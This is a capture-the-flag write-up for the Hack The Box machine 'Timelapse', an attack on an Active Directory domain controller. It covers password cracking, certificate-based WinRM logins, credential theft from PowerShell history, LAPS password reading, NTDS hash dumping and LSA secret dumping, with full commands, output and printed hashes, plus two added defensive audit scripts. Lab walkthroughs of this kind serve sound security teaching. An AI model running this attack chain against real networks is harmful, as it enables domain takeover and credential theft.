HTB - Timelapse

Enumeration


Scope

IP Address: 10.10.11.152

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ nmap -p- --min-rate 10000 $ip -P

PORT     STATE SERVICE      REASON
53/tcp   open  domain       syn-ack
88/tcp   open  kerberos-sec syn-ack
135/tcp  open  msrpc        syn-ack
139/tcp  open  netbios-ssn  syn-ack
389/tcp  open  ldap         syn-ack
445/tcp  open  microsoft-ds syn-ack
464/tcp  open  kpasswd5     syn-ack
5986/tcp open  wsmans       syn-ack
9389/tcp open  adws         syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ nmap -sCV -p53,88,135,139,389,445,464,5986,9389 $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-08 22:57:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2024-07-08T22:58:52+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m02s, deviation: 0s, median: 8h00m02s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-08T22:58:13
|_  start_date: N/A
* Open ports: 53 - 88 - 135 - 139 - 389 - 445 - 464 - 5986 - 9389
* UDP Open ports: 53 - 88 - 123 - 389
* Services: DNS - KERBEROS - RPC - SMB - WinRM over SSL - LDAP
* Important Notes: FQDN: dc01.timelapse.htb - Domain: timelapse.htb

RPC

Nothing from RPC; anonymous (null session) enumeration is denied.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbclient -N -L //$ip                       

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbclient -N \\\\$ip\\shares                                                                                    
smb: \> ls                                                                                                          
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021                                         
6367231 blocks of size 4096. 1252508 blocks available

I will mount the share locally for easier navigation. Press Enter if prompted for a password.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo mount -t cifs "\\\\$ip\\shares" ./mount
Password for root@\\10.10.11.152\shares: 

I will explore each file one by one. Let's start with the .zip file.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ tree mount 
mount
├── Dev
│   └── winrm_backup.zip
└── HelpDesk
    ├── LAPS.x64.msi
    ├── LAPS_Datasheet.docx
    ├── LAPS_OperationsGuide.docx
    └── LAPS_TechnicalSpecification.docx

The other files describe LAPS as a security solution and how to install it, so we can guess that LAPS is installed on this machine.

I tried to unzip it, but it was password protected.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ unzip winrm_backup.zip   
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
   skipping: legacyy_dev_auth.pfx    incorrect password

Then I will extract a hash from it and try to crack it.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ zip2john winrm_backup.zip > zip.hash   
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt

<snip>
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
<snip>

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john zip.hash --show                                     
winrm_backup.zip/legacyy_dev_auth.pfx:supremelegacy:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip

Extracting the archive content with 7z

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ 7z x winrm_backup.zip 

<snip>
Enter password (will not be echoed):
Everything is Ok

Size:       2555
Compressed: 2611

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ ls
Nmap  legacyy_dev_auth.pfx  mount   winrm_backup.zip  zip.hash

I searched online for more information about that file type.

A .pfx (PKCS#12) file bundles a certificate with its private key, so I can extract both with the openssl tool. I also searched for the exact commands we need and ChatGPT was very useful.

Here are examples of what we can use

openssl pkcs12 -in <file>.pfx -nocerts -out privatekey.pem
openssl pkcs12 -in <file>.pfx -clcerts -nokeys -out certificate.pem
openssl rsa -in privatekey.pem -out privatekey.key
openssl x509 -in certificate.pem -out certificate.crt

When I tried to open the file, it failed because it was password-protected.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
Enter Import Password:
Mac verify error: invalid password?

So I will do the same thing as with the .zip file: extract a hash from the .pfx and crack it with john.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt 

<snip>
thuglegacy       (legacyy_dev_auth.pfx)     
<snip>

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john pfx.hash --show                                     
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx

I'm ready now to get the content of legacyy_dev_auth.pfx

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.pem
openssl x509 -in certificate.pem -out certificate.crt
openssl rsa -in privatekey.pem -out privatekey.key

Showing the extracted files

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ cat privatekey.key 
-----BEGIN PRIVATE KEY-----
<snip>
-----END PRIVATE KEY-----

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ cat certificate.crt 
-----BEGIN CERTIFICATE-----
<snip>
-----END CERTIFICATE-----

Shell as Legacyy


Now I have a private key and a certificate, but I don't have any valid credentials, so I must continue the enumeration.

I moved the .pfx file to my Windows machine and opened it to get more information. When I double-clicked the file, it opened the certificate import wizard.

I completed the steps, provided the password, and the certificate was stored on my machine. Then I opened the user certificate manager.

Under Certificates - Current User => Personal => Certificates I could see it

So we now know that this certificate was issued to the user legacyy.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -h

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
    -S, --ssl                        Enable ssl
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname. FQDN for Kerberos auth (required)                  
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash HASH                  NTHash
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -n, --no-colors                  Disable colors
    -N, --no-rpath-completion        Disable remote path completion
    -l, --log                        Log the WinRM session
    -h, --help                       Display this help message
  • I opened the help menu of evil-winrm to see the available options

    • -S to enable SSL

    • -k to provide the private key

    • -c to provide the certificate

    • -P to provide the port number

I don't know the password, but I think it's not required since we have the private key and the certificate. We also have to use a port other than the default, because the Nmap output showed that 5985 is closed while 5986 is open, which is WinRM over SSL.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -i $ip -u Legacyy -S -k privatekey.key -c certificate.crt -p Legaccy

*Evil-WinRM* PS C:\Users\legacyy\Documents> 
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
de885f236945cfd319e4dxxxxxxxxxxxx

User Flag: de885f236945cfd319e4dxxxxxxxxxxxx


Bloodhound

We're in an Active Directory environment, so I will bring in BloodHound.

*Evil-WinRM* PS C:\Users\legacyy\Documents> upload SharpHound.exe

*Evil-WinRM* PS C:\Users\legacyy\Documents> .\SharpHound.exe -c all --zipfilename timelapse

<snip>
2024-07-08T17:02:04.7467230-07:00|INFORMATION|Enumeration finished in 00:00:44.6703145
2024-07-08T17:02:04.8873443-07:00|INFORMATION|SharpHound Enumeration Completed at 5:02 PM on 7/8/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\legacyy\Documents> dir

    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/8/2024   5:02 PM          12188 20240708170204_timelapse.zip
-a----         7/8/2024   5:02 PM          10603 NzcwYWNhMTEtODlmNS00OTNiLWEyNjAtZDQ2YjczY2QzMDk2.bin
-a----         7/8/2024   5:00 PM         906752 SharpHound.exe

I started an SMB server on my Kali machine and mapped it as a drive from the Windows box.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbserver             
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\legacyy\Documents> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.

*Evil-WinRM* PS C:\Users\legacyy\Documents> move 20240708170204_timelapse.zip n:

On my Kali machine I will start BloodHound and upload the zip file.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo neo4j start          
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:60457). It is available at http://localhost:7474
There may be a short delay until the server is ready.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ bloodhound

Under C:\Users there are several users. I will look them up in BloodHound.

*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX

Shell as SVC_Deploy

The SVC_DEPLOY user is a member of LAPS_READERS, which has the ability to read the LAPS password, i.e. the password of the local Administrator account. So if we get this account, we will be able to take control of the admin account.

When I list the contents of C:\Program Files, I can see that LAPS is installed, as I guessed.

*Evil-WinRM* PS C:\> dir "Program Files"

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:28 AM                Common Files
d-----         3/3/2022  10:01 PM                internet explorer
d-----       10/25/2021   9:01 AM                LAPS
d-----         3/3/2022  10:10 PM                VMware
d-r---         3/3/2022  10:01 PM                Windows Defender
d-----        3/21/2022   8:45 PM                Windows Defender Advanced Threat Protection
d-----         3/3/2022  10:01 PM                Windows Mail
d-----         3/3/2022  10:01 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----         3/3/2022  10:01 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        9/15/2018  12:19 AM                WindowsPowerShell

I searched everywhere for the password of user svc_deploy and found it in the PowerShell history file of user legacyy.

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

I used the credential found to obtain a shell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -i $ip -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986

<snip>
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 
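The plaintext credential in ConsoleHost_history.txt is the whole privilege escalation here, and PSReadLine keeps that file per user indefinitely. The following is an added example of my own, not part of the write-up, that scans such a history file for the patterns seen above (ConvertTo-SecureString with -AsPlainText, a password on a net use command, and disabled TLS checks) and reports them with the secret redacted. The sample history is constructed; the password and server in it are placeholders.

```python
import re

# Constructed sample of a PSReadLine history file, modelled on the one found on
# the box. The password and the file server below are placeholders, not real values.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'PLACEHOLDER-PASSWORD' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net use n: \\10.0.0.5\share /user:deploy S3cret!
get-aduser -filter * -properties *
exit
"""

# Each rule is (name, regex). A named group "secret" marks the value to redact;
# rules without that group flag risky habits rather than a leaked value.
RULES = [
    ("plaintext-securestring",
     re.compile(r"ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q).*-AsPlainText", re.I)),
    ("net-use-password",
     re.compile(r"\bnet\s+use\b.*?/user:\S+\s+(?P<secret>\S+)", re.I)),
    ("tls-checks-skipped",
     re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)),
]


def redact(value: str) -> str:
    """Keep the first two characters so a finding can be matched to its source."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def scan_history(text: str) -> list[dict]:
    """Return one finding per (line, rule) match, never the secret itself."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            secret = m.groupdict().get("secret")
            findings.append({
                "line": lineno,
                "rule": name,
                "redacted": redact(secret) if secret else None,
            })
    return findings


if __name__ == "__main__":
    # On a real host the input would be the user's
    # AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']:>3}  {f['rule']:<24} {f['redacted'] or ''}")
```

Clearing the history (or setting Set-PSReadLineOption -HistorySaveStyle SaveNothing for service accounts) removes the artifact; the scanner is only useful for finding what is already there.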

Shell as Administrator

Now I can read the local administrator's password. I will use LAPSToolkit.ps1.

*Evil-WinRM* PS C:\Tools> upload LAPSToolkit.ps1
*Evil-WinRM* PS C:\Tools> import-module .\LAPSToolkit.ps1
*Evil-WinRM* PS C:\Tools> Get-LAPSComputers

ComputerName       Password                 Expiration
------------       --------                 ----------
dc01.timelapse.htb K[{h[SYYlK7v3+y.xxxxxxx 07/13/2024 15:49:00

Access the machine with wmiexec.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ impacket-wmiexec timelapse.htb/administrator@$ip

Password:                                                                                                                                                  
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>

The flag wasn't in the Administrator home directory but in the TRX user's home directory.

C:\Users>type C:\Users\TRX\Desktop\root.txt
63cbfac24c2514d221cxxxxxxxxxxxxx

Root Flag: 63cbfac24c2514d221cxxxxxxxxxxxxx

Optional

Dump the NTDS database

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'K[{h[SYYlK7v3+y.xxxxxxx' --ntds
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\administrator:K[{h[SYYlK7v3+y.gN2i1dq6 (Pwn3d!)
SMB         10.10.11.152    445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.11.152    445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c633191d8a151f59e17bd18ac49603d:::
SMB         10.10.11.152    445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.152    445    DC01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
SMB         10.10.11.152    445    DC01             timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
SMB         10.10.11.152    445    DC01             timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
SMB         10.10.11.152    445    DC01             timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
SMB         10.10.11.152    445    DC01             timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
SMB         10.10.11.152    445    DC01             timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
SMB         10.10.11.152    445    DC01             timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
SMB         10.10.11.152    445    DC01             timelapse.htb\TRX:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
SMB         10.10.11.152    445    DC01             DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f2a0c7ce9c3eb681fe94927241abf796:::
SMB         10.10.11.152    445    DC01             DB01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
SMB         10.10.11.152    445    DC01             WEB01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
SMB         10.10.11.152    445    DC01             DEV01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
SMB         10.10.11.152    445    DC01             [+] Dumped 14 NTDS hashes to /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135412.ntds of which 10 were added to the database
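A dump like the one above is also what a domain admin gets from a sanctioned password audit. As an added example of my own (not part of the write-up), the script below parses pwdump-style lines as crackmapexec or secretsdump print them, skips the status lines, and flags accounts with an empty NT hash, accounts that still store a real LM hash, and NT hashes shared by more than one account (password reuse). The sample dump is constructed; every hash in it is a placeholder except the two well-known empty-password constants.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample in the format crackmapexec prints (user:rid:lm:nt:::),
# with one tool status line and one prefixed line mixed in. Hashes are placeholders.
SAMPLE_DUMP = """\
SMB  10.0.0.10  445  DC01  [+] Dumping the NTDS, this could take a while so go grab a redbull...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
corp.local\\alice:1601:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
corp.local\\bob:1602:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
corp.local\\legacyapp:1603:0123456789abcdef0123456789abcdef:44444444444444444444444444444444:::
SMB  10.0.0.10  445  DC01  corp.local\\carol:1604:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66666666666666666666666666666666:::
"""


def parse_dump(text: str) -> list[dict]:
    """Extract user/rid/lm/nt records; a record is the last whitespace token of a line."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split()[-1].split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # status line such as "[+] Dumping ..." or "(SMBv1:False)"
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def audit_dump(text: str) -> dict:
    """Flag empty passwords, stored LM hashes and NT hashes reused across accounts."""
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for e in parse_dump(text):
        if e["nt"] == EMPTY_NT:
            # Normal for a disabled built-in Guest; a finding for any enabled account.
            findings["empty_password"].append(e["user"])
        if e["lm"] != EMPTY_LM:
            # An LM hash means the password is at most 14 chars and trivially crackable.
            findings["lm_hash_stored"].append(e["user"])
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if len(users) > 1:
            findings["shared_nt_hash"][nt] = users
    return findings


if __name__ == "__main__":
    for category, hits in audit_dump(SAMPLE_DUMP).items():
        print(f"{category}: {hits}")
```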

Dump LSA secrets

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'K[{h[SYYlK7v3+y.xxxxxxxx' --lsa
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\administrator:K[{h[SYYlK7v3+y.gN2i1dq6 (Pwn3d!)
SMB         10.10.11.152    445    DC01             [+] Dumping LSA secrets
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:aes256-cts-hmac-sha1-96:497759614428ad680741f46f137c38dde0a3c93d9e937c31aae3fafee717e881
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:aes128-cts-hmac-sha1-96:037c03ecb94020155cae4538792838a0
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:des-cbc-md5:042c43759470084a
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:plain_password_hex:a3ee63eba14d0ef5dc110f66025c3c47d0c33bf18ca9b0a376eb94fecb20264f6956d662d3e946f482ccb123406d46a5b7ca62a1b8098a1299ed2fbdcae78b50dcd47c9362d1e8f8fc9beaa15c0b8412984c4d73c7a936ffc2c54dd7effcd0e84e483eda39b1499a578fbb302fe325c30ea41add8ed85e1b8b6efc670f173cc2b174771dfc48a18ade69c57c9c6739d5b16ebff18d31e9cef3f0930d08a4730c34bd113ad16c24190ea3d13b397fd701f8ffb2ed01636c7efeba9567b95c6169fbafe452d6c7bd136499192b1a76fd8dc085d1f48516dd74ff1e21e9cfdf981ed5c7327a2cb00943cc93536543f779ee
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:aad3b435b51404eeaad3b435b51404ee:f2a0c7ce9c3eb681fe94927241abf796:::
SMB         10.10.11.152    445    DC01             dpapi_machinekey:0xbc6b4be0de66f262c75df7ae4f7dadf34fa03ddc
dpapi_userkey:0x074fe8860a0fbca40b902c409998b1b9cd332cd1
SMB         10.10.11.152    445    DC01             NL$KM:ae8cbd2f8ab948875ff21e2c4214575e90e61caccd234226ced71fb5d37fd6446b297b58ff89bda74596ef5a96b1e1071f719d9d0fe11d1e3a95dd4f13a9a692
SMB         10.10.11.152    445    DC01             [+] Dumped 7 LSA secrets to /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135833.secrets and /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135833.cached
